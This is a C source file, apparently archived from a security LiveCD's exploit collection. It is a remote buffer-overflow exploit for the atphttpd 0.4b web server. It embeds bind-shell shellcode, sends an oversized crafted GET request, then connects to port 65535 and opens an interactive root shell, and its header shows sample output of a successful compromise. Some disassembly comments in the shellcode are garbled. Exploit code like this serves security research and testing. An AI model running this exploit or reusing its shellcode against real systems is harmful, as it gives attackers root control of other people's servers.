home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webserver / atphttpd / atphttp0x06.c

< prev

next >

Wrap

C/C++ Source or Header  |  2005-02-12  |  10KB  |  266 lines

---

1. /******************************* 0-day ;]****************************************\
2. **********************************************************************************
3. ** Remote atphttpd <= 0.4b linux exploit by r-code d_fence@gmx.net              **
4. **                                                                              **
5. ** The exploit was successfuly tested against Debian 3.0 (Woody)                **
6. ** and Red Hat 8.0 (Psyche) (both) with atphttpd 0.4b (latest)                  **
7. ** installed from source..                                                      **
8. **                                                                              **
9. ** The exploit gains the privilages of the user who runs atphttpd               **
10. ** which is usually root.. the offsets may vary even for the same               **
11. ** distros.. (e.g. on two different woody`s with the same athttpd               **
12. ** installed on I got two different offsets working 1300 and 2400), so you      **
13. ** you might have to play with them...                                          **
14. **                                                                              **
15. ** example:                                                                    **
16. **                                                                              **
17. ** bash~$ ./athttpd localhost 2400                                              **
18. **                                                                              **
19. **(<->) Atphttpd <= 0.4b remote exploit by r-code d_fence@gmx.net               **
20. **(<->) Greetz to: czarny,|stachu|, Nitro, Zami, Razor, Jedlik, Cypher          **
21. **                                                                              **
22. ** <==> OFFSET: 0x8fc                                                           **
23. ** <==> RET_ADDR: 0xbffff6fe                                                    **
24. ** <==> Connecting to 'localhost' on port '80'..                                **
25. ** <==> Sending packets..                                                       OO
26. **                                                                              **
27. ** ### Exploit failed ... just kidding ;]                                       **
28. ** ### Exploit successful - enjoy your shell                                    **
29. **                                                                              **
30. ** uid=0(root) gid=0(root) groups=0(root)                                       **
31. **  23:25:51 up  3:21,  1 user,  load average: 0.44, 0.41, 0.42                 **
32. **  USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT       **
33. **  root     tty1     -                20:05    3:19m  2.32s  2.22s  -bash      **
34. **  Linux coredump 2.4.20 #1 czw sie 7 22:04:49 UTC 2003 i686 unknown           **
35. ** /atphttpd-0.4b                                                               **
36. **readline: warning: rl_prep_terminal: cannot get terminal settingsbash-2.05a#  **
37. **********************************************************************************
38. **********************************************************************************/ 
39.  
40.  
41. #include <stdio.h>
42. #include <netinet/in.h>
43. #include <stdlib.h>
44. #include <netdb.h>
45. #include <unistd.h>
46. #include <sys/socket.h>
47. #include <errno.h>
48.  
49. /* Bind shellcode (port 65535) by Ramon de Carvalho Valle  */
50.  
51. char shellcode[]= /*  72 bytes                          */
52.     "\x31\xdb"              /*  xorl    %ebx,%ebx                 */
53.     "\xf7\xe3"              /*  mull    %ebx                      */
54.     "\x53"                  /*  pushl   %ebx                      */
55.     "\x43"                  /*  incl    %ebx                      */
56.     "\x53"                  /*  pushl   %ebx                      */
57.     "\x6a\x02"              /*  pushl   -bashx02                     */
58.     "\x89\xe1"              /*  movl    %esp,%ecx                 */
59.     "\xb0\x66"              /*  movb    -bashx66,%al                 */
60.     "\xcd\x80"              /*  int     -bashx80                     */
61.     "\xff\x49\x02"          /*  decl    0x02(%ecx)                */
62.     "\x6a\x10"              /*  pushl   -bashx10                     */
63.     "\x51"                  /*  pushl   %ecx                      */
64.     "\x50"                  /*  pushl   %eax                      */
65.     "\x89\xe1"              /*  movl    %esp,%ecx                 */
66.     "\x43"                  /*  incl    %ebx                      */
67.     "\xb0\x66"              /*  movb    -bashx66,%al                 */
68.     "\xcd\x80"              /*  int     -bashx80                     */
69.     "\x89\x41\x04"          /*  movl    %eax,0x04(%ecx)           */
70.     "\xb3\x04"              /*  movb    -bashx04,%bl                 */
71.     "\xb0\x66"              /*  movb    -bashx66,%al                 */
72.     "\xcd\x80"              /*  int     -bashx80                     */
73.     "\x43"                  /*  incl    %ebx                      */
74.     "\xb0\x66"              /*  movb    -bashx66,%al                 */
75.     "\xcd\x80"              /*  int     -bashx80                     */
76.     "\x59"                  /*  popl    %ecx                      */
77.     "\x93"                  /*  xchgl   %eax,%ebx                 */
78.     "\xb0\x3f"              /*  movb    -bashx3f,%al                 */
79.     "\xcd\x80"              /*  int     -bashx80                     */
80.     "\x49"                  /*  decl    %ecx                      */
81.     "\x79\xf9"              /*  jns     <bindsocketshellcode+45>  */
82.     "\x68\x2f\x2f\x73\x68"  /*  pushl   -bashx68732f2f               */
83.     "\x68\x2f\x62\x69\x6e"  /*  pushl   -bashx6e69622f               */
84.     "\x89\xe3"              /*  movl    %esp,%ebx                 */
85.     "\x50"                  /*  pushl   %eax                      */
86.     "\x53"                  /*  pushl   %ebx                      */
87.     "\x89\xe1"              /*  movl    %esp,%ecx                 */
88.     "\xb0\x0b"              /*  movb    -bashx0b,%al                 */
89.     "\xcd\x80"              /*  int     -bashx80                     */;
90.  
91. #define LEN 820
92. #define DEFAULT_OFFSET 2400         /* Offsets might be betwen 1000-3000 , you can try in 100 steps*/
93. #define PORT 80                     /* Default port */
94. #define ALIGN 1
95.     
96. int connect_to_host(char *hs,int port)
97. {
98.         int                     sock,x;
99.         struct sockaddr_in      addr;
100.     struct hostent  *host;
101.     
102.     if(!(host = gethostbyname(hs))) {
103.         perror("gethostbyname(): while resolving host");
104.         exit(1);
105.     }
106.     
107.     
108.         addr.sin_family = AF_INET;
109.         addr.sin_port = htons(port);
110.     bcopy(host->h_addr,&addr.sin_addr,host->h_length);
111.  
112.         if((sock = socket(AF_INET, SOCK_STREAM, 0))<0)         {
113.                 perror("socket() error");
114.                 return(-1);
115.         }
116.  
117.         if((x = connect(sock, (struct sockaddr *)&addr, sizeof(addr)))<0) {
118.                 perror("connect() error");
119.                 return(-1);
120.         }
121.  
122.         return sock;
123. }
124.  
125.  
126.  
127. void shell(int sd)
128. {
129.         int check;
130.         char cmd[]="id; w; uname -a; pwd;export TERM=vt100; exec /bin/bash -i\n";
131.         char buf[2048];
132.             fd_set fd;
133.  
134.             bzero(buf,2048);
135.         send(sd,cmd,strlen(cmd),0);
136.  
137.         while(1)  {
138.     
139.             fflush(stdout);
140.             FD_ZERO(&fd);
141.             FD_SET(sd,&fd);
142.             FD_SET(STDIN_FILENO,&fd);
143.             select(sd+1,&fd,NULL,NULL,NULL);
144.         
145.             if(FD_ISSET(sd,&fd))   {
146.                 if((check=read(sd,buf,2048))<=0)
147.                     exit(1);
148.             
149.             buf[check]=0;
150.             printf("%s",buf);
151.             }
152.         
153.             if(FD_ISSET(STDIN_FILENO,&fd))    {
154.                 if((check=read(STDIN_FILENO,buf,2048))>0) {
155.                     buf[check]=0;
156.                 write(sd,buf,check);
157.                 }
158.             }
159.         }
160.         return;
161. }
162.  
163.  
164.  
165.  
166. int main(int argc,char **argv) {
167.     int i,sd;
168.     char http_req[LEN];
169.     unsigned long int ret=0,offset=DEFAULT_OFFSET;
170.  
171.  
172.     printf("(<->) Atphttpd <= 0.4b remote exploit by r-code d_fence@gmx.net\n");
173.     printf("(<->) Greetz to: czarny,|stachu|, Nitro, Zami, Razor, Jedlik, Cypher\n\n");
174.     
175.  
176.     if(argc<2 || argc>3){
177.         printf("[-] Usage: %s [host] <offset> #OFFset\n",argv[0]);
178.         return -1;
179.     }
180.             
181.     
182.     if(argc>2)
183.         offset=atoi(argv[2]);
184.     
185.     ret=0xbffffffa - offset;
186.     
187.     printf("<==> OFFSET: 0x%x\n",offset);
188.     printf("<==> RET_ADDR: 0x%x\n",ret);
189.             
190.  
191.     /* See comment few lines below ;] */
192.     
193.     http_req[0x00]='G';
194.     http_req[0x01]='E';
195.     http_req[0x02]='T';
196.     http_req[0x03]=' ';
197.     http_req[0x04]='/';
198.     
199.      for(i=0x05;i<LEN;) {
200.          http_req[ALIGN + i++] = (ret & 0x000000ff);
201.          http_req[ALIGN + i++] = (ret & 0x0000ff00) >> 8;
202.          http_req[ALIGN + i++] = (ret & 0x00ff0000) >> 16;
203.          http_req[ALIGN + i++] = (ret & 0xff000000) >> 24;
204.      }
205.  
206.     
207.      for(i=0x05;i<(LEN/2);i++)
208.          http_req[i]=0x41;          /* Using jump-next instruction instead of nops for a better look ;] */
209.          
210.          for(i=0;i<strlen(shellcode);i++)
211.              http_req[(LEN/2)-(strlen(shellcode)/2)+i]=shellcode[i];
212.              
213.      
214.     http_req[LEN-0x0c]=' ';
215.     http_req[LEN-0x0b]='H';
216.     http_req[LEN-0x0a]='T';
217.     http_req[LEN-0x09]='T';
218.     http_req[LEN-0x08]='P';
219.     http_req[LEN-0x07]='/';
220.     http_req[LEN-0x06]='1';
221.     http_req[LEN-0x05]='.';
222.     http_req[LEN-0x04]='1';
223.     http_req[LEN-0x03]=0x0d;
224.     http_req[LEN-0x02]=0x0a;
225.     http_req[LEN-0x01]=0x00;
226.  
227.     /* Yeah.. I know I just could strcpy/cat it ;].. but so it looks soooooo l33t ;] aint`t it ? ;) */
228.     
229.     printf("<==> Connecting to '%s' on port '%d'..\n",argv[1],PORT);
230.     
231.     if((sd=connect_to_host(argv[1],PORT))<0) {
232.         printf("<==> Couldn`t connect to host.. :-/\n");
233.         exit(1);
234.     }
235.     
236.     printf("<==> Sending packets..\n");
237.             
238.         
239.     if(send(sd,http_req,LEN,0)<0) {
240.         perror("<==> send(): while sending evil http request");
241.         return -1;
242.     }
243.  
244.     close(sd);
245.         
246.     if((sd=connect_to_host(argv[1],65535))<0) {
247.         printf("<==> Exploit failed..! #Probably due to a bad offset\n");
248.         return -1;
249.     }
250.  
251.  
252.     printf("\n### Exploit failed ");
253.     fflush(stdout);
254.     sleep(1);
255.     printf("... just kidding ;]\n");
256.     sleep(1);
257.     printf("### Exploit successful - enjoy your shell\n\n");
258.     shell(sd);
259.     
260.     return 1;
261. }
262.  
263.  
264.  
265.  
266.